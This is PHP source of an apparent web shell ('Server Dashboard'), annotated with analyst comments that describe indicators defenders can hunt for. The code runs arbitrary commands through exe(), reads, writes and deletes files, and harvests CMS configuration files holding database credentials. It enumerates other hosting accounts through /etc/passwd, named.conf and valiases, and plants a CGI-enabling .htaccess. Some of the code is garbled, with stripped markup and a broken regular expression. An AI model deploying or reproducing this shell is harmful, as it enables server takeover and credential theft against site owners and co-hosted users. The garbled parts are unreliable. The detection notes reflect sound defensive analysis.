['includes/config.php'],
            'WordPress' => ['wp-config.php'],
            'Joomla' => ['configuration.php'],
            'WHMCS' => ['configuration.php'],
            'Lokomedia' => ['conf/configuration.php'],
            'Drupal' => ['sites/default/settings.php'],
            'Magento' => ['app/etc/local.xml', 'app/etc/env.php'],
            'PrestaShop' => ['config/settings.inc.php'],
            'OpenCart' => ['config.php', 'admin/config.php'],
            'Laravel' => ['.env', 'config/app.php']
        ];
        // The map pairs an application name with the relative paths of the files
        // where that application stores its settings (database credentials, keys).
        return $cmsConfigs;
    }
    // NOTE(review): everything down to the next closing brace is the tail of a
    // function whose header lies above the visible text. detectCMS() below calls it
    // as grabConfig('cms'), so this is presumably grabConfig() and $configFiles is
    // built in the part not shown -- confirm against the full file.
    // Every readable entry is collected; a directory entry is walked recursively for
    // files ending in conf/config/properties/ini/xml.
    $foundConfigs = [];
    foreach ($configFiles as $file) {
        if (is_readable($file)) {
            if (is_dir($file)) {
                // If it is a directory, scan its contents
                $files = recursiveScan($file, ['conf', 'config', 'properties', 'ini', 'xml']);
                $foundConfigs = array_merge($foundConfigs, $files);
            } elseif (is_file($file)) {
                $foundConfigs[] = $file;
            }
        }
    }
    return $foundConfigs;
}

// Analyst summary of the helpers in this listing: they give a single web request
// file read / write / copy / recursive delete, archive extraction, command execution
// (exe()), and enumeration of other accounts on the host through /etc/passwd,
// /etc/named.conf and /etc/valiases.
// Indicators visible here that a defender can hunt for:
//   - the PHP worker reading /etc/passwd, /etc/named.conf or /etc/valiases/<user>
//   - the PHP worker spawning `wget --help`, `perl --help`, `python --help`
//     (run on every page load below) or unzip / tar / unrar
//   - outbound HTTPS from the web server to api64.ipify.org and www.bing.com/search
//   - requests carrying a `dir` query parameter that holds a filesystem path

// Function to detect the CMS.
// Probes $directory for each file name returned by grabConfig('cms') and returns a
// map of CMS name => first path that exists and is readable. Only the first hit per
// CMS is kept (the inner loop breaks).
function detectCMS($directory) {
    $cmsConfigs = grabConfig('cms');
    $detected = [];
    foreach ($cmsConfigs as $cms => $configs) {
        foreach ($configs as $config) {
            $configPath = $directory . '/' . $config;
            if (file_exists($configPath) && is_readable($configPath)) {
                $detected[$cms] = $configPath;
                break;
            }
        }
    }
    return $detected;
}

// Recursive directory scan function that does not use shell commands.
// Returns the paths of readable regular files under $directory, optionally limited
// to the lower-cased extensions in $extensions. Recursion stops once $currentDepth
// reaches $maxDepth (default 10). Because it relies only on scandir(), it spawns no
// child process; the activity shows up as file-system reads by the PHP worker.
function recursiveScan($directory, $extensions = [], $maxDepth = 10, $currentDepth = 0) {
    if ($currentDepth >= $maxDepth) {
        return [];
    }
    $files = [];
    if (!is_dir($directory) || !is_readable($directory)) {
        return $files;
    }
    try {
        $items = scandir($directory);
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            $path = $directory . '/' . 
$item;
            if (is_dir($path)) {
                // Recurse into the subdirectory
                $subFiles = recursiveScan($path, $extensions, $maxDepth, $currentDepth + 1);
                $files = array_merge($files, $subFiles);
            } elseif (is_file($path) && is_readable($path)) {
                // Filter by extension when a list was given
                if (empty($extensions)) {
                    $files[] = $path;
                } else {
                    $ext = pathinfo($path, PATHINFO_EXTENSION);
                    if (in_array(strtolower($ext), $extensions)) {
                        $files[] = $path;
                    }
                }
            }
        }
    } catch (Exception $e) {
        // Errors are silently ignored
    }
    return $files;
}

// Function to read /etc/passwd.
// Returns every run of non-colon characters that directly precedes ':x:' in the
// file, or an empty array when the file is not readable.
function readEtcPasswd() {
    $users = [];
    if (is_readable('/etc/passwd')) {
        $passwd = file_get_contents('/etc/passwd');
        if (preg_match_all('/([^:]+):x:/', $passwd, $matches)) {
            $users = $matches[1];
        }
    }
    return $users;
}

// Function to look up user directories.
// For each name from readEtcPasswd() it tests a fixed list of home / web-root
// locations and records the first one that is a readable directory (and matches
// $pattern when one is given). A non-empty result means directories belonging to
// other accounts are readable by the web-server user, which is what per-account
// isolation on shared hosting is meant to prevent.
function findUserDirectories($pattern = null) {
    $users = readEtcPasswd();
    $userDirs = [];
    foreach ($users as $user) {
        $possiblePaths = [
            "/home/{$user}/public_html",
            "/home/{$user}",
            "/var/www/{$user}",
            "/usr/home/{$user}",
            "/hsphere/local/home/{$user}"
        ];
        foreach ($possiblePaths as $path) {
            if (is_dir($path) && is_readable($path)) {
                if ($pattern === null || preg_match($pattern, $path)) {
                    $userDirs[$user] = $path;
                    break;
                }
            }
        }
    }
    return $userDirs;
}

// Function to read domains from named.conf.
// Extracts the text between '/var/named/' and '.db' for every zone-file reference
// in /etc/named.conf; returns an empty array when the file is not readable.
function readDomainsFromNamedConf() {
    $domains = [];
    if (is_readable('/etc/named.conf')) {
        $namedConf = file_get_contents('/etc/named.conf');
        if (preg_match_all('#/var/named/(.*?)\.db#', $namedConf, $matches)) {
            $domains = $matches[1];
        }
    }
    return $domains;
}

// Function to read domains from valiases.
// Returns every whitespace-separated token found in /etc/valiases/<user>.
function readDomainsFromValiases($user) {
    $domains = [];
    $valiasesPath = "/etc/valiases/{$user}";
    if (is_readable($valiasesPath)) {
        $content = file_get_contents($valiasesPath);
        if (preg_match_all('/\S+/', $content, $matches)) {
            $domains = $matches[0];
        }
    }
    return $domains;
}

// File write function that tries several methods.
// Returns true on the first method that succeeds, false otherwise. $mode is used
// only by the fopen() fallback; the file_put_contents() attempt always overwrites.
// The function_exists() probes and '@' suppression let it keep working, without
// warnings in the error log, when individual functions are unavailable.
function writeFile($file, $content, $mode = 'w') {
    // Try file_put_contents
    if (function_exists('file_put_contents')) {
        $result = @file_put_contents($file, $content);
        if ($result !== false) {
            return true;
        }
    }
    // Try fopen + fwrite
    if (function_exists('fopen') && function_exists('fwrite')) {
        $handle = @fopen($file, $mode);
        if ($handle) {
            $result = @fwrite($handle, $content);
            @fclose($handle);
            return $result !== false;
        }
    }
    return false;
}

// File read function that tries several methods.
// Returns the file contents, or false when no method succeeds. Note that the last
// fallback returns highlight_file() output, i.e. HTML markup rather than raw bytes.
function readFileContent($file) {
    // Try file_get_contents
    if (function_exists('file_get_contents') && is_readable($file)) {
        $content = @file_get_contents($file);
        if ($content !== false) {
            return $content;
        }
    }
    // Try fopen + fread
    if (function_exists('fopen') && function_exists('fread') && is_readable($file)) {
        $handle = @fopen($file, 'r');
        if ($handle) {
            $content = '';
            while (!feof($handle)) {
                $content .= @fread($handle, 8192);
            }
            @fclose($handle);
            return $content;
        }
    }
    // Try highlight_file (for PHP files)
    if (function_exists('highlight_file') && is_readable($file)) {
        ob_start();
        @highlight_file($file);
        $content = ob_get_clean();
        if ($content) {
            return $content;
        }
    }
    return false;
}

// Copy function with a fallback.
// Uses copy() when it exists; otherwise reads the source with readFileContent() and
// writes it with writeFile(). Returns a boolean success flag.
function copyFile($source, $destination) {
    if (function_exists('copy')) {
        return @copy($source, $destination);
    }
    // Manual copy fallback
    if (is_readable($source)) {
        $content = readFileContent($source);
        if ($content !== false) {
            return writeFile($destination, $content);
        }
    }
    return false;
}

// Function to unarchive (extract) a file.
// Extracts $archiveFile into $extractTo (default: the archive's own directory).
// Order of attempts: ZipArchive for zip, PharData for tar/gz/bz2, then a shell
// command through shell_exec() (the only route for rar). The shell route returns
// is_dir($extractTo), which says the target directory exists, not that extraction
// worked. On the shell route the web server spawns unzip, tar or unrar with stderr
// sent to /dev/null.
function unarchiveFile($archiveFile, $extractTo = null) {
    if (!is_file($archiveFile) || !is_readable($archiveFile)) {
        return false;
    }
    if ($extractTo === null) {
        $extractTo = dirname($archiveFile);
    }
    $ext = strtolower(pathinfo($archiveFile, PATHINFO_EXTENSION));
    // Check for a supported extension
    $supported = ['zip', 'tar', 'gz', 'bz2', 'rar'];
    if (!in_array($ext, $supported)) {
        return false;
    }
    // Try ZipArchive for .zip
    if ($ext == 'zip' && 
class_exists('ZipArchive')) {
        $zip = new ZipArchive();
        if ($zip->open($archiveFile) === TRUE) {
            $result = $zip->extractTo($extractTo);
            $zip->close();
            return $result;
        }
    }
    // Try PharData for .tar, .tar.gz, .tar.bz2
    if (($ext == 'tar' || $ext == 'gz' || $ext == 'bz2') && class_exists('PharData')) {
        try {
            $phar = new PharData($archiveFile);
            $phar->extractTo($extractTo);
            return true;
        } catch (Exception $e) {
            return false;
        }
    }
    // Try shell commands as a fallback
    if (function_exists('shell_exec')) {
        $cmd = '';
        if ($ext == 'zip') {
            $cmd = "unzip -q '{$archiveFile}' -d '{$extractTo}' 2>/dev/null";
        } elseif ($ext == 'tar') {
            $cmd = "tar -xf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null";
        } elseif ($ext == 'gz') {
            $cmd = "tar -xzf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null";
        } elseif ($ext == 'bz2') {
            $cmd = "tar -xjf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null";
        } elseif ($ext == 'rar') {
            $cmd = "unrar x '{$archiveFile}' '{$extractTo}/' 2>/dev/null";
        }
        if ($cmd) {
            @shell_exec($cmd);
            return is_dir($extractTo);
        }
    }
    return false;
}

// Function to display syntax highlighting.
// Returns an HTML-safe rendering of $file, or false when it cannot be read.
// Extensions outside $highlightable are returned HTML-escaped with no decoration;
// .php files go through highlight_file(); the rest are escaped and then passed
// through per-type preg_replace() calls.
// NOTE(review): as the text stands, the replacement strings in the switch carry no
// markup, so the replacements leave the content almost unchanged; the wrapping tags
// were presumably lost when the page was extracted -- confirm against the original.
function highlightFileContent($file) {
    if (!is_file($file) || !is_readable($file)) {
        return false;
    }
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    // Only these file types can be highlighted
    $highlightable = ['php', 'html', 'htm', 'js', 'css', 'txt', 'json', 'xml', 'sql', 'conf', 'config'];
    if (!in_array($ext, $highlightable)) {
        return htmlspecialchars(readFileContent($file));
    }
    // Try highlight_file for PHP
    if ($ext == 'php' && function_exists('highlight_file')) {
        ob_start();
        @highlight_file($file);
        return ob_get_clean();
    }
    // For other files, use highlight_string or manual highlighting
    $content = readFileContent($file);
    if ($content === false) {
        return false;
    }
    $content = htmlspecialchars($content);
    // Simple manual highlighting based on the file type
    switch($ext) {
        case 'html':
        case 'htm':
            $content = 
preg_replace('/<(\/?)([a-zA-Z][a-zA-Z0-9]*)/', '<$1$2', $content);
            $content = preg_replace('/<!--(.*?)-->/', '<!--$1-->', $content);
            break;
        case 'js':
            $keywords = ['function', 'var', 'let', 'const', 'if', 'else', 'for', 'while', 'return', 'true', 'false', 'null', 'undefined'];
            foreach ($keywords as $keyword) {
                $content = preg_replace('/\b' . $keyword . '\b/', '' . $keyword . '', $content);
            }
            break;
        case 'css':
            $content = preg_replace('/([^{}]+)\{/', '$1{', $content);
            $content = preg_replace('/\b([a-zA-Z-]+)\s*:/', '$1:', $content);
            break;
        case 'conf':
        case 'config':
            $content = preg_replace('/^(\s*)([a-zA-Z_][a-zA-Z0-9_]*)\s*=/m', '$1$2 =', $content);
            break;
    }
    // The content is returned between two one-line string literals (a newline each).
    return '
' . $content . '
';
}

// Function to detect archive files in a directory.
// Lists the regular files directly inside $directory (no recursion) whose extension
// is in $archiveExtensions, returning name, path, formatted size and extension for
// each. Returns an empty array when the directory cannot be read.
function detectArchiveFiles($directory) {
    $archiveExtensions = ['zip', 'tar', 'gz', 'bz2', 'rar', '7z', 'tgz', 'tbz2'];
    $archives = [];
    if (!is_dir($directory) || !is_readable($directory)) {
        return $archives;
    }
    $items = @scandir($directory);
    if (!$items) return $archives;
    foreach ($items as $item) {
        if ($item == '.' || $item == '..') continue;
        $path = $directory . '/' . $item;
        if (is_file($path)) {
            $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION));
            if (in_array($ext, $archiveExtensions)) {
                $size = formatSize($path);
                $archives[] = [
                    'name' => $item,
                    'path' => $path,
                    'size' => $size,
                    'ext' => $ext
                ];
            }
        }
    }
    return $archives;
}

// Bing search function (simulation).
// Sends $query to www.bing.com/search from the server and returns the de-duplicated,
// lower-cased host names found in the response (leading 'www.' removed), one per
// line; returns '' when the request yields nothing.
// The request is made with certificate verification switched off
// (CURLOPT_SSL_VERIFYPEER => false) and a fixed browser-like User-Agent string, so
// in egress logs it appears as an HTTPS connection from the web server to Bing.
// NOTE(review): the preg_match_all() pattern below is not a valid regular
// expression as shown (unbalanced parenthesis); the markup it matched on appears to
// have been stripped during extraction -- confirm against the original file.
function bing($query) {
    $query = urlencode($query);
    $url = "https://www.bing.com/search?q={$query}&count=50";
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    ]);
    $html = curl_exec($ch);
    curl_close($ch);
    if (!$html) return '';
    preg_match_all('/ ]+)/i', $html, $matches);
    $domains = [];
    if (!empty($matches[1])) {
        foreach ($matches[1] as $host) {
            $host = strtolower($host);
            $host = preg_replace('/^www\./', '', $host);
            if (!in_array($host, $domains)) {
                $domains[] = $host;
            }
        }
    }
    return implode("\n", $domains);
}

// ========== OLD FUNCTIONS ==========

// Returns "Windows" when PHP_OS starts with 'WIN' (case-insensitive); every other
// platform is reported as "Linux".
function detectOS() {
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        return "Windows";
    } else {
        return "Linux";
    }
}

// Returns the size of $file as a string with two decimals and a unit, 'N/A' when
// the file is missing or unreadable, and '0 B' for an empty file. The unit index is
// derived from the number of decimal digits in the byte count.
function formatSize($file) {
    if (!file_exists($file) || !is_readable($file)) return 'N/A';
    $bytes = filesize($file);
    if ($bytes == 0) return '0 B';
    $sizes = ['B', 'KB', 'MB', 'GB', 'TB'];
    $factor = floor((strlen($bytes) - 1) / 3);
    return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . 
$sizes[$factor];
}

// Command execution wrapper -- the capability that makes this file a web shell.
// If $cmd names an existing file, that file's contents are returned instead and
// nothing is executed. Otherwise the first available of system(), exec(),
// passthru(), shell_exec() runs $cmd and its output is returned; false is returned
// when none of them exists. Output is HTML-escaped on every branch except the
// passthru() one. All calls are '@'-suppressed, so failures leave no PHP warning.
// Detection: shell or interpreter processes whose parent is the PHP / web-server
// worker. The script itself reads the `disable_functions` ini value further down.
function exe($cmd) {
    if(is_file($cmd)) {
        $buff = @file_get_contents($cmd);
        return htmlspecialchars($buff);
    }
    if(function_exists('system')) {
        @ob_start();
        @system($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return htmlspecialchars($buff);
    } elseif(function_exists('exec')) {
        @exec($cmd,$results);
        $buff = "";
        // exec() returns the output as lines; they are joined without separators
        foreach($results as $result) {
            $buff .= $result;
        }
        return htmlspecialchars($buff);
    } elseif(function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $buff = @ob_get_contents();
        @ob_end_clean();
        return $buff;
    } elseif(function_exists('shell_exec')) {
        $buff = @shell_exec($cmd);
        return htmlspecialchars($buff);
    }
    return false;
}

// Recursively deletes $dir and everything in it: files with unlink(),
// subdirectories by recursion, then the directory itself with rmdir(). Returns
// false when $dir is not a directory, otherwise the result of the final rmdir().
function deleteDirectory($dir) {
    if (!is_dir($dir)) return false;
    $files = array_diff(scandir($dir), array('.', '..'));
    foreach ($files as $file) {
        $filePath = "$dir/$file";
        is_dir($filePath) ? deleteDirectory($filePath) : unlink($filePath);
    }
    return rmdir($dir);
}

// Wraps a permission string depending on whether $dir is writable.
// NOTE(review): both branches return the same value as the text stands; the markup
// that presumably distinguished them appears to have been lost in extraction.
function w($dir,$perm) {
    if(!is_writable($dir)) {
        return ''.$perm.'';
    } else {
        return ''.$perm.'';
    }
}

// Wraps a permission string depending on whether $dir is readable.
// NOTE(review): same observation as for w() -- the two branches are identical here.
function r($dir,$perm) {
    if(!is_readable($dir)) {
        return ''.$perm.'';
    } else {
        return ''.$perm.'';
    }
}

// Renders fileperms($file) as a ten-character ls-style string: one file-type
// character followed by rwx triplets for owner, group and others, with s/S and t/T
// standing for setuid, setgid and sticky bits.
function perms($file){
    $perms = fileperms($file);
    // File type, taken from the high bits of the mode
    if (($perms & 0xC000) == 0xC000) {
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        $info = 'p';
    } else {
        $info = 'u';
    }
    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
    // Others
    $info .= (($perms & 0x0004) ? 
'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}

// Formats a byte count $s as GB / MB / KB (two decimals, 1024-based) or plain bytes.
function hdd($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f',$s / 1073741824 ).' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f',$s / 1048576 ) .' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f',$s / 1024 ) .' KB';
    else
        return $s .' B';
}

// The working directory is taken straight from the `dir` query parameter and passed
// to chdir() with no validation, so any path the web-server user can enter is
// reachable. In access logs this appears as a `dir=` parameter holding an absolute
// filesystem path.
if(isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    @chdir($dir);
} else {
    $dir = getcwd();
}

// Maps a truthy / falsy value to the label 'ON' or 'OFF'.
function checkStatus($condition) {
    return $condition ? 'ON' : 'OFF';
}

// Asks api64.ipify.org for an IP address. The request is made by the server, so the
// answer is the host's outbound address as seen from the internet; the fallback
// string is returned when the request fails. This is an outbound connection on
// every page load.
function getMyIP() {
    $ch = curl_init('https://api64.ipify.org');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $ip = curl_exec($ch);
    curl_close($ch);
    return $ip ? $ip : 'Tidak Diketahui';
}

// Host reconnaissance, executed at top level on every request: OS and kernel
// string, the address the Host header resolves to, disk usage of '/', the
// safe_mode and disable_functions ini values, and whether curl, wget, perl and
// python are available. The last three probes each run a `--help` command through
// exe(), i.e. three child processes per page view.
$os = detectOS();
$kernel = php_uname();
$server_ip = gethostbyname($_SERVER['HTTP_HOST']);
$ip_user = getMyIP();
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? 'ON' : 'OFF';
$ds = @ini_get("disable_functions");
$curl = (function_exists('curl_version')) ? 'ON' : 'OFF';
$wget = (exe('wget --help')) ? 'ON' : 'OFF';
$perl = (exe('perl --help')) ? 'ON' : 'OFF';
$python = (exe('python --help')) ? 'ON' : 'OFF';
$show_ds = (!empty($ds)) ? $ds: "NONE";

// Identity of the account the script runs as. Without the posix extension only the
// script owner's name / uid / gid are available and the group name is shown as "?";
// with it, the effective user and group are resolved to names.
if(!function_exists('posix_getegid')) {
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
} else {
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}

// ========== NEW TABS ADDED ==========
// Tab keys and labels; the code further down compares $_GET['do'] against keys such
// as 'home', 'fileops', 'jumping' and 'grab' to choose what to render.
$additional_tabs = [
    'home' => ' Home',
    'fileops' => ' File Operations',
    'jumping' => ' Jumping',
    'grab' => ' Grab Config',
    'scan' => ' Recursive Scan',
    'archive' => ' Archive Tools'
];

// Header section
echo '

Server Dashboard

'.$_SERVER['HTTP_HOST'].'
OS: '.$os.'
Server IP: '.$server_ip.'
User: '.$user.'
Free Space: '.$freespace.' / '.$total.'
Safe Mode: '.$sm.'
Your IP: '.$_SERVER['REMOTE_ADDR'].'
'; // Navigation Tabs echo '
'; // ========== PENANGANAN TAB BARU ========== // Tab Home - DIPERBAIKI (Default current dir + Common Directories) if($_GET['do'] == 'home') { echo '
Home Directory & Common Directories
'; // Current Directory Info echo '
Current Directory: '.$dir.'
Permissions: '.w($dir, perms($dir)).'
'; // Current Directory Contents echo '
Current Directory Contents
'; if(is_dir($dir) && is_readable($dir)) { $items = @scandir($dir); if($items) { echo '
'; $count = 0; foreach($items as $item) { if($item == '.' || $item == '..') continue; $count++; if($count > 20) { echo '
... and more
'; break; } $full_path = $dir . '/' . $item; $is_dir = is_dir($full_path); $icon = $is_dir ? 'bi-folder-fill text-warning' : 'bi-file-earmark text-info'; $size = $is_dir ? 'DIR' : ''.formatSize($full_path).''; echo '
'.htmlspecialchars($item).'
'.($is_dir ? ' ' : ' ' ).' '.$size.'
'; } echo '
'; // Show total count $total_items = count($items) - 2; // subtract . and .. echo '
Showing '.min(20, $total_items).' of '.$total_items.' items
'; } else { echo '
Cannot scan directory
'; } } else { echo '
Cannot read current directory
'; } echo '
'; // Common Directories echo '
Common Directories
'; $common_dirs = [ '/' => ['Root Directory', 'bi-hdd'], '/home' => ['Home Directory', 'bi-house-door'], '/home/'.$user => ['User Home', 'bi-person'], '/home/'.$user.'/public_html' => ['Public HTML', 'bi-globe'], '/var/www/html' => ['Apache Root', 'bi-server'], '/var/www' => ['Web Directory', 'bi-folder'], '/tmp' => ['Temp Directory', 'bi-clock'], '/etc' => ['System Configuration', 'bi-gear'], '/usr/local' => ['Local Programs', 'bi-terminal'], '/opt' => ['Optional Software', 'bi-box'], '/root' => ['Root Home', 'bi-person-check'], '/proc' => ['Process Info', 'bi-diagram-3'], '/sys' => ['System Info', 'bi-cpu'], '/dev' => ['Device Files', 'bi-device-hdd'], '/mnt' => ['Mount Points', 'bi-usb-drive'], '/media' => ['Removable Media', 'bi-usb-plug'], '/srv' => ['Service Data', 'bi-hdd-stack'], '/boot' => ['Boot Files', 'bi-power'], '/lib' => ['System Libraries', 'bi-book'], '/bin' => ['System Binaries', 'bi-terminal'], '/sbin' => ['System Admin Binaries', 'bi-terminal-fill'], '/usr/bin' => ['User Binaries', 'bi-terminal'], '/usr/sbin' => ['User Admin Binaries', 'bi-terminal-fill'], '/usr/local/bin' => ['Local User Binaries', 'bi-terminal'], '/usr/local/sbin' => ['Local Admin Binaries', 'bi-terminal-fill'], '/var/log' => ['Log Files', 'bi-journal-text'], '/var/tmp' => ['Variable Temp', 'bi-clock-history'], '/var/run' => ['Runtime Data', 'bi-play-circle'], '/var/lock' => ['Lock Files', 'bi-lock'], '/var/spool' => ['Spool Directory', 'bi-printer'], '/var/mail' => ['Mail Directory', 'bi-envelope'], '/var/cache' => ['Cache Files', 'bi-lightning'] ]; echo '
'; foreach($common_dirs as $path => $dir_info) { list($desc, $icon_class) = $dir_info; if(is_dir($path) && is_readable($path)) { // Get directory info $item_count = 0; $size_info = 'DIR'; if($handle = @opendir($path)) { while(false !== ($entry = readdir($handle))) { if($entry != '.' && $entry != '..') { $item_count++; } } closedir($handle); } $permissions = perms($path); $writable = is_writable($path); $perm_badge = $writable ? 'W' : 'R'; echo '
'.$desc.' '.$perm_badge.'
'.$item_count.' items
'.$path.' '.$permissions.'
'; } else { echo '
'.$desc.' N/A
'.$path.' (Not accessible)
'; } } echo '
'; // Directory stats $accessible_count = 0; foreach($common_dirs as $path => $dir_info) { if(is_dir($path) && is_readable($path)) { $accessible_count++; } } echo '
'.$accessible_count.'
Accessible
'.(count($common_dirs) - $accessible_count).'
Inaccessible
'; echo '
'; // JavaScript untuk filter directories echo ''; } // Tab File Operations (dipindahkan dari Archive Tools) elseif($_GET['do'] == 'fileops') { echo '
File Operations
'; echo '
'; // File Operations echo '
File Operations
'; if(isset($_POST['do_file_op'])) { $source = $_POST['source_file']; $dest = $_POST['dest_file']; $operation = $_POST['file_op']; echo '
'; switch($operation) { case 'copy': if(copyFile($source, $dest)) { echo '
File copied successfully from '.$source.' to '.$dest.'
'; } else { echo '
Failed to copy file
'; } break; case 'read': $content = readFileContent($source); if($content !== false) { echo '
File content read successfully
'
                            .htmlspecialchars(substr($content, 0, 5000)).'
'; } else { echo '
Cannot read file or file not found
'; } break; case 'write': $content = $_POST['file_content'] ?? ''; if(writeFile($dest, $content)) { echo '
File written successfully to '.$dest.'
'; } else { echo '
Failed to write file
'; } break; case 'highlight': $highlighted = highlightFileContent($source); if($highlighted !== false) { echo '
File highlighted successfully
'.$highlighted.'
'; } else { echo '
Cannot highlight file
'; } break; } echo '
'; } echo ''; echo '
'; // Quick File Tools echo '
Quick File Tools
Create New File Create New Folder
File Functions Status:
file_get_contents: '.(function_exists('file_get_contents') ? 'Available' : 'Not Available').'
fopen/fread: '.(function_exists('fopen') && function_exists('fread') ? 'Available' : 'Not Available').'
highlight_file: '.(function_exists('highlight_file') ? 'Available' : 'Not Available').'
'; echo '
'; // Modals untuk find files echo ' '; } // Tab Jumping - DIPERBAIKI elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; // Check for HSphere if(preg_match("/hsphere/", $dir)) { echo '
HSphere Jumping
'; $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "
Searching in HSphere...
"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); if($f) { while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $status = is_writable($url_user) ? 'RW' : 'R'; echo ""; } } } fclose($f); } } echo "
Status Path Actions
{$status} {$url_user} Open
"; if($i == 0) { echo '
No accessible directories found
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } else { // Show domain list from HSphere echo '
'; } echo '
'; } // Check for vHosts elseif(preg_match("/vhosts|vhost/", $dir)) { echo '
vHosts Jumping
'; preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "
Searching in vHosts...
"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace("www.", "", $url); $web_vh = "/var/www/".($vh[1] ?? 'unknown')."/$url/httpdocs"; if(is_dir($web_vh) === true && is_readable($web_vh)) { $i++; $status = is_writable($web_vh) ? 'RW' : 'R'; echo ""; } } echo "
Status Domain Path Actions
{$status} {$url} {$web_vh} Open
"; if($i == 0) { echo '
No accessible vHosts directories found
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } else { // Show domain list from Bing echo '
'; } echo '
'; } // Default /etc/passwd scanning else { echo '
User Directory Jumping
'; echo "
Scanning /etc/passwd for user directories...
"; $etc = fopen("/etc/passwd", "r"); if(!$etc) { echo '
Can\'t read /etc/passwd
'; } else { echo '
'; while($passwd = fgets($etc)) { if(preg_match_all('/(.*?):x:/', $passwd, $user_jumping)) { foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $status = is_writable($user_jumping_dir) ? 'RW' : 'R'; // Try to get domain $domain_info = ""; if(function_exists('posix_getpwuid')) { $domain_jump = @file_get_contents("/etc/named.conf"); if($domain_jump) { preg_match_all("#/var/named/(.*?)\.db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); if($user_jumping_url && $user_jumping_url['name'] == $user_idx_jump) { $domain_info = "{$dj}"; break; } } } if(empty($domain_info)) { $domain_info = 'No domain'; } } else { $domain_info = 'posix not available'; } echo ""; } } } } fclose($etc); echo "
User Status Directory Domain Actions
{$user_idx_jump} {$status} {$user_jumping_dir} {$domain_info} Open
"; if($i == 0) { echo '
No user directories found with public_html
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } echo '
'; } echo ""; } // Tab Grab Config - DIPERBAIKI elseif($_GET['do'] == 'grab') { echo '
Grab Configuration Files
'; // Buat direktori pbm_config $config_dir = $dir . "/pbm_config"; @mkdir($config_dir, 0777, true); // Buat file .htaccess untuk konfigurasi $htaccess_content = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; $htaccess_file = $config_dir . "/.htaccess"; @file_put_contents($htaccess_file, $htaccess_content); // Cek jika berada di vhosts if(preg_match("/vhosts|vhost/", $dir)) { echo '
vHosts Directory Detected: '.$dir.'
